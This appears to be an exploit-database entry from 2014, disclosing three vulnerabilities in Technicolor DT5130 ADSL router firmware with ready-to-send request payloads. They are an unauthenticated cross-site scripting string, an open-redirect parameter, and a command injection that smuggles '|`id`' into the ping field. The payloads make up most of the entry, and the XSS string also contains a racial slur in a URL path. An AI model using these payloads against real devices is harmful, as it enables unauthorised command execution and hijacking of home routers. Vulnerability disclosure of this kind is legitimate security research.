[] NeoSense
E X P L O I T S
title author type platform port cve id

Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities

Author: Crash
type: webapps
platform: hardware
port: 80.0
date_added: 2014-12-04 
date_updated: 2014-12-04 
verified: 0 
codes: CVE-2014-9144;CVE-2014-9143;CVE-2014-9142;OSVDB-115285;OSVDB-115284;OSVDB-115283 
tags: 
aliases:  
screenshot_url:  
application_url: 
Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE


--
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss  Security Team
www.dclabs.com.br / www.ibliss.com.br
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.